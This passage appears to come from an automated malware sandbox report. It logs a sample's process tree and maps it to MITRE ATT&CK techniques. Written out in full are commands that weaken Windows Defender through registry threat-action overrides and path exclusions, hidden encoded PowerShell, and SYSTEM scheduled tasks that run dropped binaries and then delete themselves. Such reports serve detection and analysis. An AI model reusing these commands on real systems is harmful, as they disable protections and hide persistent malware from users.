- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5964
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5980
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5996
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6044
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6060
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6076
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6092
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6108
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:6132
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:736
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:5228
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5260
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3204
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4744
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1572
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2872
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5296
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5292
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1336
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3008
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3292
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5332
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1536
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5360
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4336
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5388
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5392
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gDVVmaqMc" /SC once /ST 01:51:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:3284
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gDVVmaqMc"
  2⤵
  PID:1472
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gDVVmaqMc"
  2⤵
  PID:5516
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 01:17:40 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe\" XT /dEsite_idNZT 385118 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:2340
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "BAnwxolbGpCzXNxkj"
  2⤵
  PID:5256

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5484
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5780
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5768

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5856

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5904

C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe XT /dEsite_idNZT 385118 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:528
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bWycNackLSywaqkmgR"
  2⤵
  PID:3128
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:4260
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:1752
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:3080
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5380
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:5732
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\vAeHwP.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:2564
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "qbSDwEgyNYPZlGA2" /F /xml "C:\Program Files (x86)\ByWuwrOBU\WUGGbkD.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5616
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "qbSDwEgyNYPZlGA"
  2⤵
  PID:5840
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "qbSDwEgyNYPZlGA"
  2⤵
  PID:5148
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "yJQYurcljWrTFb" /F /xml "C:\Program Files (x86)\RVqmAwyyxwiU2\YCfxMSe.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5948
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "MrNSpwukvDtlP2" /F /xml "C:\ProgramData\wGkeBUkfAIhWvVVB\AvKHovV.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:6000
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "qnWLzqfHNJaEQUiUn2" /F /xml "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\rYBRMvB.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:4468
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "FBXQMyjqJGqSqkHthaW2" /F /xml "C:\Program Files (x86)\DUGaRsFaSnqjC\aQbGfpM.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:6108
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "QhciBzJOokLnyYZub" /SC once /ST 12:41:20 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ofqvFcNvzeRditbz\ViKQsLpw\WxIZUPa.dll\",#1 /LHsite_idkmI 385118" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:5552
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "QhciBzJOokLnyYZub"
  2⤵
  PID:5516
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "BAnwxolbGpCzXNxkj"
  2⤵
  PID:212

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\ViKQsLpw\WxIZUPa.dll",#1 /LHsite_idkmI 385118
1⤵
PID:4064
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\ViKQsLpw\WxIZUPa.dll",#1 /LHsite_idkmI 385118
  2⤵
  - Blocklisted process makes network request
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Enumerates system info in registry
  PID:5648
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "QhciBzJOokLnyYZub"
    3⤵
    PID:4992

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery